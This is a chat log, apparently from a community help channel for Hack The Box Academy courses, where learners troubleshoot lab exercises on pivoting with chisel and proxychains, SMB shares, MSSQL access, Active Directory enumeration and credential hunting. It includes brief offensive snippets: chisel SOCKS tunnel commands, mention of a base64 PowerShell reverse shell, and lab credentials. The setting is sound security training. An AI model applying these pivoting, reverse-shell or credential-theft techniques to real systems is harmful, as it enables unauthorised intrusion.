you ran commands you didnt fully understand on your HOST 💀 ??

why were you using a VM???

smbserver [sharename] [options] [mountlocation]

I didn’t have a choice, all vm’s I downloaded were too slow and it could only allow a windows machine for the first few commands

the sharename is what's used for other devices using smb to connect to your share

"too slow" sounds like you didn't configure them properly

also the command should have been for a target windows. not to be run on your own isntance

idk any module in the path that requires you to run your own windows system. if one is needed it gets provided for you

So how do I specify the sharename if this is the share command:

I tried
copy \\10.10.15.54:4444\share\aaa C:\Users\htb-student\Desktop

It didn’t for me. It just gave me Linux and it told me I had to do it

Do you know how to fix the issue or is computer completely fucked

then you severely misunderstood the instructions

what is aaa is that the file?

Yes

I did the entire course without ever touching my windows desktop. I used linux/mac laptops and never even needed a windows vm

then that should work, idk why you're needing to use a different port though?

Cause after making 1 share I started getting an error that the port is in use even after restarting the service

ah

i don't use the pwnbox often so i forget what services run by default

Well great. Thanks for the help for my broken computer

my second question: does that file exist in that file location?

Yeah it does

so if you do ls -la ~/htb the file aaa is there?

yeah

afaik there's no easy way to change the UNC port, just use the default 445 aka don't specify a port

try:
1.netsh int ip reset c:\resetlog.txt
2. ipconfig /flushdns

then restart the computer

Tried that before and just tried that again. It works for 2 mins then it does the same as usual

after a restart you get internet for two minutes then it stops?

Yep exactly

I also cannot load up Google chrome at all

Doesnt make much sense. You can try resetting the network adapter otherwise id just opt for a reinstall.

Damn

Also on this module how in the world do you do the first two steps without using a windows host? academy.hackthebox.com/module/158/section/1435

you are given a windows host to rdp into

God damnit

God damnit

"after configruing the portproxy on our Windows-based pivot host*"

you misread the instructions

I’m gonna kms

Broke my computer cause I misread directions

Fuck

have you tried just deleting the v4tov4 stuff?

portproxy delete blah blah google the syntax

in the pwnbox there are 2 proxychains conf files: proxychains4.conf proxychains.conf which should I modify to use socks5?

Yeah I tried that, no luck. Think I may just have to reset everything on my pc

might as well

Thank you for the help though and pointing out where I screwed up lol. Really gonna read the directions carefully next time

it helps to focus on the high level conceptually what you're trying to achieve.

Even if you misread the directions had you asked yourself 'how would this command help the goal of pivoting if Im running it from my own host' you mightve been able to stop yourself and checked your reading before it was too late

it pays to think critically about each and every command you run. You need to be prepared to supply the command and explain it to a client if nothing else

True true

Learned that lesson the hard way but still good to learn it regardless lol

if it makes you feel better you learned a bonus lesson on why people dont hack things from their host and use VMs lol

True I’m gonna configure my vm correctly since it took 20 mins to load up internet explorer on it originally lol

also worth remembering that HTB has very explicitly designed the course so that the entire thing including the exam can be done exclusively from the browser based pwnbox

though anyone who does so is clearly insane, but still

like its a hard rule, sections dont get added to any module in the course unless you can complete the lab within the pwnbox

am I doing it right?

if so why is it not working

Ok gotcha, I will definitely remember that. Good to know the same for the exam

./chisel server -v -p 1234 --socks5 ./chisel client -v 10.129.202.64:1234 socks

your commands are also flipped for reverse proxy.

in a reverse proxy you host the server on your attacker host and connect from the client on the pivot

oh alright thanks

about the proxychains file if I use the command proxychains ping 172.x.x.x I should only configure the proxychains.conf file instead of the proxychains4.conf

ofc itll fail

ping uses ICMP

if you want ping you have to use a vpn styled proxy setup like ligolo-ng

proxychains/socks only does tcp and udp(poorly)

yes I tried using ligolo but unfortunately it was not connecting due to some reason

any idea why this is happening?

well its windows so it's backslash not forward slash for starters

your shell probably doesnt have error output and thus not seeing the failed to run results

ping also isn't terribly important, you should definitely learn both tools

I am using the powershell base64 from revshells do you have any other in mind to use for the purpose?

not really, you dont necessarily need it, im just saying its hiding information from you that may have been useful in troubleshooting

but the forward slash is the first problem to solve

.\ and ./ are NOT interchangeable on windows

forward slash is fine in powershell

sure? I habit typed./ last night in a lab and it errored on me

Also: did it transfer properly?

hmm started up powershell on work laptop and yeah forward does work. Wonder why it wouldnt last night. oh well

I guess no

I will transfer it again

might be in cmd that time

nah I never use cmd unless im forced to

The year is 1993, you gave just installed Microsoft 3.1

Can someone assist me with this question, maybe I'm just confused but I'm having a lot of trouble:

Authenticate to 10.129.164.247 with user "damundsen" and password "SQL1234!"
Leverage SQLAdmin rights to authenticate to the ACADEMY-EA-DB01 host (172.16.5.150). Submit the contents of the flag at C:\Users\damundsen\Desktop\flag.txt.

The first question instructed me to RDP to the htb-user at 10.129.164.247 which I did no problem. Then this question's hint says to use mssqlclient.py which won't connect to the damundsen@10.129.164.247. I can RDP into damundsen@10.129.164.247 with the given credentials but not through mssqlclient.py.

Any tips?

Use sql from the context of the damundsen user

:p

172.16.5.150 is an internal host, you need to be on the internal network to access it

Right which is what I initially thought, but then the hint says to use mssqlclient.py which I assume to mean to do it from a Linux attack host no?

There's an internal linux host

Usually in this section there's a Linux attack host and a Windows attack host you can spawn, but in this question there's only a Windows attack host. So I guessed the only way to use mssqlclient.py would be from my own Linux attack host

The windows host is your initial vector: the linux host is also constant, it's stated in multiple sections of this module at the top what the credentials are and what host its on

Ah okay that makes sense, I thought the Linux host only was available in questions where it was explicitly mentioned

If you read the blurb regarding the linux host it'll tell you more info

:p

test

Your copy/paste is getting deleted by automod

so confused lmao

It's being seen as spam because it's a large block of text

so i cant copy output, cant copy pictures... great lmao

Read #welcome and you can find out how to do those things :)

It takes maybe, at most, 5 minutes

will do thx

@fathom pendant So since this question states: Authenticate to 10.129.164.247 with user "damundsen" and password "SQL1234!" it wants me to RDP into the host? I'm just trying to understand why add this blurb of information with that IP address and not the internal network address of 172.16.x.x

Reading the question carefully helps: it asks afterwords to leverage their sqladmin rights to access an internal host

You don't need mssql to complete this btw

Yeah I know, I was just trying to figure out how it expected us to use mssqlclient.py to do it that's what was confusing me. I understand everything else

I mean another method is pivoting

The module is assuming you remember/took notes on the internal Linux host to use

Took care of this, and answered my own question in the process ty

Yeah I remember the credentials for the linux host (they're the same as for the windows host) but usually you need to spawn the linux attack host to get the IP address that you can then SSH into. This question only provides the IP address of the Windows MS01 host

Yes

Because you can use windows to achieve the same thing

The section I believe goes over using some sql tools

Right which is what I ended up doing, but the hint telling me to use mssqlclient.py is what got me off track. Maybe the Linux host was also supposed to be spawned for this question idk

It is spawned

And able to be connected to

Rdp to ms01, and ssh to linux

I don't have an IP address to SSH to, it didn't give me one and the linux host to SSH into changes everytime it's spanwed. I had to go back to a Linux centered question and spawn the Linux host. But really it's not that important as you mentioned it's able to be done from the Windows host

... my brother in christ

The internal 172.x.x.x address that's provided in previous blurbs regarding that host is constant

172.16.5.225

It is spawned with the windows host

Actually if you're doing the "privileged access" section it's literally in the setup subheading

Ok that's my bad I wasn't clear enough, I knew the SSH access to the internal address is up and can be accessed via SSH from the MS01 host since it says that in the module. I meant usually when it expects us to SSH into that Linux attack host it provides us with the other subnet address of 10.x.x.x which we could SSH into. It's also my bad for not just SSH into the internal address, I just am used to using my VM to SSH into the Linux attack host directly and was focused on that more than just paying attention to a simple solution thats literally outlined in the text

Which is extra dumb on my part because I had this question yesterday and I just SSH into the internal address, got the other IP address and then connected to the 10.x.x.x address from my VM

Sorry I get a bit obssessed with tiny details sometimes and miss the forest for the trees, gotta get better at looking at the big picture and not wasting all my time when there's a solution right in front of me

that's only on occasion: in this case - it's specifically stated: and yes that host does have a 10.x.x.x ip but likely due to backend reasons, they can't provide that to you

what's provided is the main target host

Yeah I understand

On the bright side, it forced me to get better at using PowerUpSQL which I hadn't used before as opposed to mssqlclient which I have used a lot

but it's not like it's hiding from you

just gotta sometimes remind yourself that there are limitations ¯_(ツ)_/¯

Yeah I do this way too much just get zoned in on one thing and trying to understand why it's not the way I expect it to be lol character flaw of mine I guess

any idea how do I complete the task
Find cleartext credentials for another domain user. Submit the username as your answer.
in skill assessment ad enumeration?

sometimes tech just doesn't work the way you want it to; but it works

sounds like you don't have either PowerView loaded or ActiveDirectory loaded

I loaded powerview which gave me get object acl

But get domainforeignuser is not working

you don't need to use powerview for that

sounds like you're thinking in terms of AD settings. Try good old post exploitation credential hunting 🙂

Is anyone familiar with evilginx?

what academy module does this relate to?

this does not apply to the module, I just found out maybe someone uses it and can help

this channel is for discussion and help with academy modules

read #welcome to find out how to access more of the server and find a better place to ask your question

hello there, I'm struggling to find the password for the root user to access https://vc01.inlanefreight.local/ui/login, any hint would be great appreciate it...
Module : WinPrivEsc
Section: Further Credential Theft

what have you tried

basically all the commands explained into the section

but working with regedit HKEY_CURRENT_USER 2 users got my attention

but can't get the session info

not sure if I'm in the right way

Im losing my mind on Pillaging Module

Specifically the restic part: "Log in as Jeff via RDP and find the password for the restic backups. Submit the password as the answer."

Im logged in as Jeff and have gone through the module a dozen times

I have looked for RESTIC_PASSWORD in environmental variables - nada

tried running string searches as well throughout the box

What on earth am I missing, there has to be something obvious that I am not doing

LoL I need to review my sight, I found it

Anyone ?

Please...

Someone help me with the question:+ 0 What is the path to the htb-student's mail?

I don't know if I understood it correctly but I have to find a file called mail or something like that

I figured it out, it was so stupid

Which module are you on?

I can look at my notes to assist, currently 94% done with this beast

Sistem Information (Linux Fundamentals)

how?

you're looking for a directory, try the list of commands given at the start of the section

sorry, I dont have this one under my belt yet

So I use a command to find email, I mean ls?

ls -al

for all files in a directory

you're not looking for an email, the question asked path to tb-students mail, it's a path/directory

again use the list of commands given at the start of the section

hi, having issues on intro to malware analysis. I believe my issues are stemming from inetsim configuration. On the target vm when I go to a webpage using https I get the inetsim response, when using http I get a 405 error. I've tried changing the http port in the config and I still get 405 error. Any tips?

env

#Skills Assessment - Windows Fundamentals module
3. Creating a user called Jim
Uncheck: User must change password at logon

I think reading the question it's expected to do it from a GUI possibly ADUC but I cannot find it in the windows box because it's not installed/configured?

<@&861185840277487616>

Anyone?

I don't have my notes for that module, but seems like you're on the right path using a GUI. Might want to find out if there are other methods to managing a user account.

Windows has a native way to do ot without AD

I know I can add it via Users Account on Control Panel but the option of "Uncheck" is pointing me to ADUC because I haven't seen that option on a regular way of creating a new user acc